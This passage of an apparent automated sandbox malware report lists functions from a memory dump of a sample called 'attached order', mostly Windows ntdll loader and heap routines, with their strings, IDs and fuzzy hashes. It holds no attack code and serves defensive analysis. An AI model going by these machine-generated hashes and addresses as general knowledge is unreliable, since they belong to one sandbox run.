                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: ***Exception thrown within loader***$Break repeatedly, break Once, Ignore, terminate Process or terminate Thread (boipt)? $Execute '.cxr %p' to dump context$Function %s raised exception 0x%08lxException record: .exr %pContext record: .cxr %p$LdrpGenericExceptionFilter$LdrpProtectedCopyMemory$minkernel\ntdll\ldrutil.c
                                                                                          • API String ID: 0-2973941816
                                                                                          • Opcode ID: fa335ec7a342a41c9149dca1599c50935c3aa691753956e7b1aa5cc383c23349
                                                                                          • Instruction ID: e1879d072dfc142fc9ab416db99e7a4abdadea30c7ce2940b99f95b7d1bb2656
                                                                                          • Opcode Fuzzy Hash: fa335ec7a342a41c9149dca1599c50935c3aa691753956e7b1aa5cc383c23349
                                                                                          • Instruction Fuzzy Hash: 202165B32041427FEB289A6D8CDDFA7FB69FB91670F140905F663AB59AC750EB00C254
                                                                                          Function 0173E9A0 Relevance: 8.6, Strings: 6, Instructions: 1073COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                                                          • API String ID: 0-1109411897
                                                                                          • Opcode ID: df2f25401ce27e6ccce66ca19fd4d9961a1ad0348c20429aba17634b112de207
                                                                                          • Instruction ID: 86619532fc7725d259b30dba7e29675a0f10e4b72a1a6552cae6d5a24c304d64
                                                                                          • Opcode Fuzzy Hash: df2f25401ce27e6ccce66ca19fd4d9961a1ad0348c20429aba17634b112de207
                                                                                          • Instruction Fuzzy Hash: FEA23870E0562A8BDF64CF18D9887ADFBB1BF84304F1442E9D90AA7291DB319E85CF41
                                                                                          Function 0173AD00 Relevance: 8.1, Strings: 6, Instructions: 573COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: #$H$J$LdrpResSearchResourceMappedFile Enter$LdrpResSearchResourceMappedFile Exit$MUI
                                                                                          • API String ID: 0-4098886588
                                                                                          • Opcode ID: 507c7d5c2530177be69c983901e4028c02508d18aba47d5ce91697fd1f5f5c5f
                                                                                          • Instruction ID: 94b685ccc912468ea81e6e42318e848aaad1504e09816a980b249bc13395cc57
                                                                                          • Opcode Fuzzy Hash: 507c7d5c2530177be69c983901e4028c02508d18aba47d5ce91697fd1f5f5c5f
                                                                                          • Instruction Fuzzy Hash: C73290719442698BDF22CB28CC98BEEFBB5BF85340F1441EAD849A7252D7319E85CF50
                                                                                          Function 0176631F Relevance: 7.8, Strings: 6, Instructions: 261COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                                          • API String ID: 0-792281065
                                                                                          • Opcode ID: 74863d862b8a76c63cf745828634c41d45e602a1f4c5967641c68babd47fe33a
                                                                                          • Instruction ID: 9736a8662d7df522d9108df82352ebd7230a512ca05caecb506bd0d5106df967
                                                                                          • Opcode Fuzzy Hash: 74863d862b8a76c63cf745828634c41d45e602a1f4c5967641c68babd47fe33a
                                                                                          • Instruction Fuzzy Hash: 00919B70A41315DFDB36DF19D859BAAFBA9FF80710F944268FE016B289D7B09901CB90
                                                                                          Function 0172640D Relevance: 7.6, Strings: 6, Instructions: 150COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          • minkernel\ntdll\ldrinit.c, xrefs: 017897A0, 017897C9
                                                                                          • Getting the shim engine exports failed with status 0x%08lx, xrefs: 01789790
                                                                                          • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 0178977C
                                                                                          • apphelp.dll, xrefs: 01726446
                                                                                          • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 017897B9
                                                                                          • LdrpInitShimEngine, xrefs: 01789783, 01789796, 017897BF
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                          • API String ID: 0-204845295
                                                                                          • Opcode ID: 81c26aca4d24772709e25797a084d44fffc1ab220cdf9d37a033da9e3c258a71
                                                                                          • Instruction ID: 5c0ca379dd6d5839a3f5a6dab63fde0eb75d750e5dff1b395abb685397d04746
                                                                                          • Opcode Fuzzy Hash: 81c26aca4d24772709e25797a084d44fffc1ab220cdf9d37a033da9e3c258a71
                                                                                          • Instruction Fuzzy Hash: E251C2712883019FE321EF29C895A6BF7E4FB94648F10491EFA8597159DB30DA04CB92
                                                                                          Function 0176C5C6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          • Unable to build import redirection Table, Status = 0x%x, xrefs: 017A7FF0
                                                                                          • minkernel\ntdll\ldrinit.c, xrefs: 0176C5E3
                                                                                          • Loading import redirection DLL: '%wZ', xrefs: 017A7F7B
                                                                                          • minkernel\ntdll\ldrredirect.c, xrefs: 017A7F8C, 017A8000
                                                                                          • LdrpInitializeImportRedirection, xrefs: 017A7F82, 017A7FF6
                                                                                          • LdrpInitializeProcess, xrefs: 0176C5E4
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                                                          • API String ID: 0-475462383
                                                                                          • Opcode ID: 5e7b186dfd06d7fc770181b56f0997bf11fa702c677db43f9654bbc534135467
                                                                                          • Instruction ID: 372171f29ec58931f19da9aca6edcfb28444f9298da58368d91dac8c611d308b
                                                                                          • Opcode Fuzzy Hash: 5e7b186dfd06d7fc770181b56f0997bf11fa702c677db43f9654bbc534135467
                                                                                          • Instruction Fuzzy Hash: AD3125B16443029FC325EF28DC59E2BFBD8EF94B10F144958FD84AB295E660DD04CBA2
                                                                                          Function 01762594 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 017A1FA9
                                                                                          • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 017A1FC9
                                                                                          • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 017A1F82
                                                                                          • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 017A1F8A
                                                                                          • RtlGetAssemblyStorageRoot, xrefs: 017A1F6A, 017A1FA4, 017A1FC4
                                                                                          • SXS: %s() passed the empty activation context, xrefs: 017A1F6F
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                                                          • API String ID: 0-861424205
                                                                                          • Opcode ID: 1ee4a607f97d5373df270bc05c92222fead548bdc8fbc86af4df5b5673137a3c
                                                                                          • Instruction ID: 24949c649c096e97820cf415d06c0d77a3a9aaffdff77235a953097f4991966a
                                                                                          • Opcode Fuzzy Hash: 1ee4a607f97d5373df270bc05c92222fead548bdc8fbc86af4df5b5673137a3c
                                                                                          • Instruction Fuzzy Hash: 45310872B412157BFB218A8A8C55F9BFA6C9BA0B50F444159BE017724AD770EE01C7E1
                                                                                          Function 017B4BC0 Relevance: 6.5, Strings: 5, Instructions: 246COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: .DLL$.Local$/$\$\microsoft.system.package.metadata\Application
                                                                                          • API String ID: 0-2518169356
                                                                                          • Opcode ID: 8ee2dcbaab884b34c02ffe721a90f3be3ed339e0237c0db64398aa0836ef11e1
                                                                                          • Instruction ID: 86606f99abd5db8bf24e039e8b318c71b4d3b9d94ef407c49dbfa8d1498fbd3c
                                                                                          • Opcode Fuzzy Hash: 8ee2dcbaab884b34c02ffe721a90f3be3ed339e0237c0db64398aa0836ef11e1
                                                                                          • Instruction Fuzzy Hash: F8919D72D006299BCB25CFACC881AEEF7F4EF48710F1941A9E912E7352E7759941CB90
                                                                                          Function 0173A2E0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                                          • API String ID: 0-379654539
                                                                                          • Opcode ID: 96d9490fd2347135432d2614e281c55c8031de038a1b7097476bd2bd049feb92
                                                                                          • Instruction ID: f89089b89d585209d66dbdbda5778ef155e155ee4ff94034b9466038d46f4d78
                                                                                          • Opcode Fuzzy Hash: 96d9490fd2347135432d2614e281c55c8031de038a1b7097476bd2bd049feb92
                                                                                          • Instruction Fuzzy Hash: 1EC168711083829BDB21DF18C045B6AF7E4EF85704F0449AAF9D6CB292E778CA49CB56
                                                                                          Function 01768322 Relevance: 5.3, Strings: 4, Instructions: 263COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 0176847E
                                                                                          • minkernel\ntdll\ldrinit.c, xrefs: 01768341
                                                                                          • @, xrefs: 017684B1
                                                                                          • LdrpInitializeProcess, xrefs: 01768342
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                                                          • API String ID: 0-1918872054
                                                                                          • Opcode ID: 4ba52a282b28dc2c0b3a45b54044ab738c49e65c03191ad6f45b52861f25238b
                                                                                          • Instruction ID: f6598cab28b14ff80f3532aa5a6c5bc0f8c9d2ca7a079792be092978f3517d27
                                                                                          • Opcode Fuzzy Hash: 4ba52a282b28dc2c0b3a45b54044ab738c49e65c03191ad6f45b52861f25238b
                                                                                          • Instruction Fuzzy Hash: 95918B71148341AFD722EE25C845EABFBECEB84744F44492EFA8982151E374DA44CB63
                                                                                          Function 01740B10 Relevance: 5.3, Strings: 4, Instructions: 260COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          • ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock, xrefs: 017953BB
                                                                                          • HEAP: , xrefs: 017952ED, 017953AE
                                                                                          • ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock)), xrefs: 017952FA
                                                                                          • HEAP[%wZ]: , xrefs: 017952DE, 0179539F
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))$HEAP: $HEAP[%wZ]: $ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock
                                                                                          • API String ID: 0-1657114761
                                                                                          • Opcode ID: 819e060857485a4b645b2e8c5e856d76843cc1ef182004777f5c16831561f3b0
                                                                                          • Instruction ID: 6e90d6a8bbc5f5dc07e6ccde702d9c545bd3c7f8b3233c5daa0558b3cde7107d
                                                                                          • Opcode Fuzzy Hash: 819e060857485a4b645b2e8c5e856d76843cc1ef182004777f5c16831561f3b0
                                                                                          • Instruction Fuzzy Hash: FCA10F70A00716DFDB25CF28C854BFAFBE1EF44304F1485ADE68A8B686D330A945CB95
                                                                                          Function 0176265C Relevance: 5.2, Strings: 4, Instructions: 249COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 017A20C0
                                                                                          • .Local, xrefs: 017627F8
                                                                                          • SXS: %s() passed the empty activation context, xrefs: 017A1FE8
                                                                                          • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 017A1FE3, 017A20BB
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                                          • API String ID: 0-1239276146
                                                                                          • Opcode ID: e09cd21a37d2bb728109c18c5960ad35f12c6cce95b115fcb2056777b69344ac
                                                                                          • Instruction ID: b1371c2de3e6b60fee1f0302d3aba984d493950bc1b6ebf08b01c48de060622d
                                                                                          • Opcode Fuzzy Hash: e09cd21a37d2bb728109c18c5960ad35f12c6cce95b115fcb2056777b69344ac
                                                                                          • Instruction Fuzzy Hash: 33A1B331A4022ADBDB65CF58CC88B9AF7B5BF58314F1445E9ED08A7256D7309E81CF90
                                                                                          Function 017649F0 Relevance: 5.2, Strings: 4, Instructions: 228COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 017A3241
                                                                                          • RtlDeactivateActivationContext, xrefs: 017A322F, 017A323C, 017A325B
                                                                                          • SXS: %s() called with invalid flags 0x%08lx, xrefs: 017A3234
                                                                                          • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 017A3260
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                                                                          • API String ID: 0-1245972979
                                                                                          • Opcode ID: d7493d83a6a94898902e4fe2d60af1899320ad5b373f03cd7eb9fb99c033692a
                                                                                          • Instruction ID: 90a64234f5b2850534926215a416673090686385e70f728fc3501854f4209d55
                                                                                          • Opcode Fuzzy Hash: d7493d83a6a94898902e4fe2d60af1899320ad5b373f03cd7eb9fb99c033692a
                                                                                          • Instruction Fuzzy Hash: 1A610272644712AFD722CF1CC885B2AF7A8FFD0B10F54866DE85A9B285C730E901CB91
                                                                                          Function 017363CB Relevance: 5.2, Strings: 4, Instructions: 211COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01790DEC
                                                                                          • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 01790EB5
                                                                                          • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 01790E72
                                                                                          • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01790E2F
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                                                          • API String ID: 0-1468400865
                                                                                          • Opcode ID: 2d56d42fa00bb23dcf3b7a8cb82295b2acacd4e2520b85e87fa4ab48c6345f55
                                                                                          • Instruction ID: 46ecdb0549389dbfe9cc6125d97ef4757cb6b836746653064c5e8c86010434e9
                                                                                          • Opcode Fuzzy Hash: 2d56d42fa00bb23dcf3b7a8cb82295b2acacd4e2520b85e87fa4ab48c6345f55
                                                                                          • Instruction Fuzzy Hash: 6E71C2B1904305AFCB61EF14C889F9BFBA9AF95764F400468F9494B24BD734D688CB92
                                                                                          Function 01764C3D Relevance: 5.1, Strings: 4, Instructions: 117COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          • minkernel\ntdll\ldrsnap.c, xrefs: 017A344A, 017A3476
                                                                                          • LdrpFindDllActivationContext, xrefs: 017A3440, 017A346C
                                                                                          • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 017A3439
                                                                                          • Querying the active activation context failed with status 0x%08lx, xrefs: 017A3466
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                                                                          • API String ID: 0-3779518884
                                                                                          • Opcode ID: 9f3c97fb5fa7bf21b00bbd470cd6e2db22913651e499602d912b5211e086292a
                                                                                          • Instruction ID: 7510fde549e3c88ce6bdbcb6989088427eb406729dbe48223c7432fce16eaba2
                                                                                          • Opcode Fuzzy Hash: 9f3c97fb5fa7bf21b00bbd470cd6e2db22913651e499602d912b5211e086292a
                                                                                          • Instruction Fuzzy Hash: D9311572E00751AFEF339F0C8859A75F6ECBB40764F46816AED025735DE7A09D808791
                                                                                          Function 017E0D24 Relevance: 5.1, Strings: 4, Instructions: 113COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
                                                                                          • API String ID: 0-336120773
                                                                                          • Opcode ID: b4c00a9fd1a3b324ea59116915b108171381fdec43f6a8f5acef4e0e4ceb4e5e
                                                                                          • Instruction ID: e6bedbb700fefae885bf9c1f4f46035650a80efd1db06d5013ce62505655ad51
                                                                                          • Opcode Fuzzy Hash: b4c00a9fd1a3b324ea59116915b108171381fdec43f6a8f5acef4e0e4ceb4e5e
                                                                                          • Instruction Fuzzy Hash: 4B31EE75310215EFD712EB68D88CF6AF7E8EF0CB60F1405A9F401DB291EAB1E9408B60
                                                                                          Function 0175237A Relevance: 5.1, Strings: 4, Instructions: 111COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          • minkernel\ntdll\ldrinit.c, xrefs: 0179A7AF
                                                                                          • apphelp.dll, xrefs: 01752382
                                                                                          • LdrpDynamicShimModule, xrefs: 0179A7A5
                                                                                          • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 0179A79F
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                          • API String ID: 0-176724104
                                                                                          • Opcode ID: 9b8400f5ec74877743f9d05ee3074cb41c73c096f22378521f7cdf411e94c96d
                                                                                          • Instruction ID: f5e3c0aa38161370101068fdc157b4fada5fae0fe299b7fe4f2e02d6696e0b04
                                                                                          • Opcode Fuzzy Hash: 9b8400f5ec74877743f9d05ee3074cb41c73c096f22378521f7cdf411e94c96d
                                                                                          • Instruction Fuzzy Hash: 20312771A40201EBDF329F1DE895E6AF7B5FB84B10F24406DED01AB24ADBB45A41CB50
                                                                                          Function 017428C0 Relevance: 4.7, Strings: 3, Instructions: 966COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          • HEAP: , xrefs: 01743184
                                                                                          • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 0174319D
                                                                                          • HEAP[%wZ]: , xrefs: 01743175
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                                                          • API String ID: 0-617086771
                                                                                          • Opcode ID: 7913d91065d560239e1f74a40ebd651494ce67251be2bf7dfd85c285f6af7a05
                                                                                          • Instruction ID: 8203084dda52c55b983f2c1d8305920080151b21378239d207e2f105c2dd3da7
                                                                                          • Opcode Fuzzy Hash: 7913d91065d560239e1f74a40ebd651494ce67251be2bf7dfd85c285f6af7a05
                                                                                          • Instruction Fuzzy Hash: 9692AC71A042599FDB25CF68D444BAEFBF1FF48300F188099E899AB392D735A945CF50
                                                                                          Function 01740680 Relevance: 4.2, Strings: 3, Instructions: 414COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                                          • API String ID: 0-4253913091
                                                                                          • Opcode ID: 3b0d36d2a7bace9efdcdebb8f6e65c08e6fececcb5c736cea2d43355bd6e5570
                                                                                          • Instruction ID: bc9549ed05db13634b1a6b1ef8bd5e1fbc1175ea3ea47176fcc32cb8c3362b52
                                                                                          • Opcode Fuzzy Hash: 3b0d36d2a7bace9efdcdebb8f6e65c08e6fececcb5c736cea2d43355bd6e5570
                                                                                          • Instruction Fuzzy Hash: AEF1AE70A00606DFEB26CF68C998BAAF7F5FF44300F148199E6169B385D734E985CB91
                                                                                          Function 01756882 Relevance: 4.0, Strings: 2, Instructions: 1492COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID: InitializeThunk
                                                                                          • String ID: $@
                                                                                          • API String ID: 2994545307-1077428164
                                                                                          • Opcode ID: 502af4494566a862c4c9e20f6701948ed517f0a581b12a055f3eb71423e626ec
                                                                                          • Instruction ID: e6fe0aa0de8d0ebba39c96f956f23f02382c9d029229371a8d9a00513cae3a82
                                                                                          • Opcode Fuzzy Hash: 502af4494566a862c4c9e20f6701948ed517f0a581b12a055f3eb71423e626ec
                                                                                          • Instruction Fuzzy Hash: B0C29E716083419FEB69CF28C881BABFBE5AF88704F44896DFD8987241D774D845CB92
                                                                                          Function 0172A147 Relevance: 4.0, Strings: 3, Instructions: 238COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: FilterFullPath$UseFilter$\??\
                                                                                          • API String ID: 0-2779062949
                                                                                          • Opcode ID: c8cd664a4c631dc41d88493c5a2cefea9fd1bfcbbf372764268c3b7e64fce1e5
                                                                                          • Instruction ID: 038d278186d08094d820b2656e6f3d684cf2deeba9438c56059070b4f70c1e55
                                                                                          • Opcode Fuzzy Hash: c8cd664a4c631dc41d88493c5a2cefea9fd1bfcbbf372764268c3b7e64fce1e5
                                                                                          • Instruction Fuzzy Hash: CCA14C719416299BDB32EF28CC88BEAF7B8EF44710F1005EAE909A7250D7359E85CF50
                                                                                          Function 01750AEB Relevance: 4.0, Strings: 3, Instructions: 210COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          • minkernel\ntdll\ldrinit.c, xrefs: 01799F2E
                                                                                          • Failed to allocated memory for shimmed module list, xrefs: 01799F1C
                                                                                          • LdrpCheckModule, xrefs: 01799F24
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                                                          • API String ID: 0-161242083
                                                                                          • Opcode ID: 27332cb181d377215de7d978d07392d05f79e7a729289f307d6fd7bd04642a83
